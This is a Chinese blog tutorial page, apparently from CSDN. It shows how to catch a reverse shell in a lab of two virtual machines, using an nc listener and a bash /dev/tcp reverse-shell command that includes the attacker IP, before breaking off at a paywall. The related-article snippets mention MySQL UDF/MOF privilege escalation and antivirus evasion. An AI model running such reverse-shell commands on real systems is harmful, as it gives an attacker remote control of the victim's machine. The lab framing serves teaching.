mysql 反弹shell_反弹shell升级成交互式shell

最新推荐文章于 2024-05-19 10:11:12 发布
最新推荐文章于 2024-05-19 10:11:12 发布
阅读量591 收藏 1
点赞数
文章标签: mysql 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39640573/article/details/113438333
版权
本文介绍了如何在Kali Linux环境下,通过MySQL反弹shell到CentOS7.5,并进一步升级为交互式shell。实验中,首先在Kali Linux设置nc监听,然后在CentOS7.5执行反弹shell命令。接着,在Kali Linux通过pty.spawn和stty命令升级shell,实现无回显、无命令显示的交互式环境。最后,通过exit和reset命令恢复终端状态。
摘要由CSDN通过智能技术生成

实验环境:

A : kali 虚拟机

B: centos7.5 虚拟机

1. A 机 kali 虚拟机 设置监听 端口

root@kali64:~# nc -lvvp 9001

# 端口随便定义,没被使用就行

2. B机 执行命令反弹shell

[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1

# ip地址为 kali 虚拟机的ip地址,端口为kali虚拟机监听的端口 主机ip和端口之间为`/`

补充:

标准输入 (stdin) :代码为 0

标准输出 (stdout):代码为 1

标准错误 (stderr):代码为 2

> 为重定向符号 , & 没有固定的意思

&> ,>&理解成一个整体

&>file # 将 标准输出 和 标准错误输出 都重定向到文件file中

>& # 将标准输出和标准错误输出重定向到文件/dev/tcp/,即传递到远程

2>&1 # 将标准错误重定向到标准输出中

0>&1 # 将标准输入重定向到标准输出中

反弹后再kali机上面查看,可以输入命令,不支持tab键,清屏等功能,需要升级成交互式shell

3.升级交互式shell

# 以下命令都是在kali 机上面操作

[root@localhost ~]# python -c 'import pt

最低0.47元/天 解锁文章
weixin_39640573
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1392
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
mysql 反弹shell_mysql mof+metasploit反弹shell
weixin_35895056的博客
01-27 761
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx//设置登录mysql的密码setusernamexxx//设置登录mysql的用户setrhostxx...
玄机-第二章日志分析-mysql应急响应
最新发布
JACKBREAK的博客
05-19 1375
玄机应急响应靶场日记
mysql反弹shell
weixin_40416851的博客
02-10 739
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网。
mysql 反弹shell_Discuz-ssrf利用计划任务反弹shell
weixin_39634898的博客
01-27 243
#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看权限是有的经过各种尝试无果,开始了漫长的百度之旅,皇天不负有心人...
mysql反弹shell_MySQL Rootkit 反弹Shell--PHP
weixin_39520013的博客
01-19 288
好多人在渗透的时候,知道得到了SA的密码知道该怎么办,但是得到了MYSQL的root密码之后却迷茫了(多说句废话,默认在windows文件夹中保存my.ini里面写有root密码,而且windows有访问的权限,我们学校的服务器就是这么搞到的,汗···),我当初就迷茫过。后来得知用UDF create新函数可以执行命令,但是有时候却会出现意外的情况等等利用不是很好。终于有一天JOLI大叔随手抛给我...
mysql-shell-8.0.30-linux-glibc2.12-x86-64bit.tar.gz
08-17
MySQL ShellMySQL数据库管理系统提供的一款强大的命令行工具,它集成了JavaScript、Python和SQL三种语言环境,为数据库管理员和开发者提供了交互式操作MySQL服务器、管理数据库对象以及执行复杂脚本的功能。...
自动化部署 MySQL Shell脚本
01-04
但这个命令需要交互式输入,为了自动化,我们需要在脚本中直接提供答案。可以创建一个临时的输入文件,然后通过`expect`命令来模拟交互: ```bash #!/usr/bin/expect spawn mysql_secure_installation expect ...
seata-1.5.1 交互式自动部署Shell脚本
03-10
本文将详细讲解如何利用提供的 "seata-1.5.1 交互式自动部署Shell脚本" 在 CentOS 7.9 操作系统上进行安装。 首先,让我们理解 "seata-install.sh" 这个脚本的作用。这是一个 Shell 脚本,通常用于自动化执行一系列...
Shell脚本一键部署Mysql 5.7
03-24
2. `useradd -r -g mysql -s /bin/false mysql`: 创建一个名为mysql的系统用户,分配给mysql组,并设置shell为非交互式。 脚本继续进行目录管理和MySQL的解压安装: 1. `mkdir -p /usr/local/mysql`: 创建MySQL的...
mysql-shell-8.0.20-windows-x86-64bit.zip
05-17
MySQL ShellMySQL数据库管理系统的一个重要组件,主要用于交互式地管理和操作MySQL服务器,提供了一种集成了JavaScript、Python和SQL的环境。在这个8.0.20版本的Windows 64位版本中,用户可以获得一系列高级功能,...
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 220
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
mysql反弹shell_mysql mof+metasploit反弹shell
weixin_39875805的博客
02-02 144
鉴于上篇文章http://z2ppp.blog.51cto.com/11186185/1975985mysql mof提权metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx...
windows 已拿到mysql权限最简单的反弹shell方式
YZBPXX
12-05 630
大多数人mysql密码是123456 这个时候如果还开放了该端口 可就危险了 需要运行的是5.x版本的mysql (一般老师教学都是这个版本) 对比网上powercat 脚本多了步把powercat替换成nn命令,这样windows就无法检测出病毒,同时使用vbs 来运行bat也使得用户不易察觉。 注意以下是将病毒植入开机启动程序,需要开机时才能启动 服务器需要做的事 将脚本上传到客户端可以访问的地方(如启动自带的aphacl,将脚本添加到index.html文件的链接里) 服务器启动nc -.
Mysql提权之反弹shell
热门推荐
weixin_43801718的博客
04-13 3万+
0x01 介绍 Mysql反弹shell提权,也是属于udf提权,只不过应用场景不同,例如没有得到webshell,但是获得了Mysql的root密码,恰好目标的数据库可以外连,那么就可以先将udf.dll文件的内容先插入到数据表中,然后再导出到’lib/plugin’ 0x02 适用场景 取较高权限的,比如获取webshell,或者获取到webshell无法执行高权限命令的。特别是有了SQL执行...
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 727
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
反弹shell
A_Alger的博客
09-09 268
多种姿势反弹shell bash attacker 监听 nc -lvvp 4444 victim 运行 bash -i >& /dev/tcp//4444 0>&1 nc 支持 -e 选项 attacker 监听 nc -lvvp 4444 victim 运行 nc 4444 -t -e /bin/bash python attacker 监听 nc -...
mysql shell
09-08
MySQL Shell 是一个交互式的命令行工具,用于与 MySQL 数据库进行交互和管理。它提供了几种不同的操作模式和语言接口,包括 SQL、Python 和 JavaScript。 使用 MySQL Shell,您可以执行各种任务,例如连接到数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值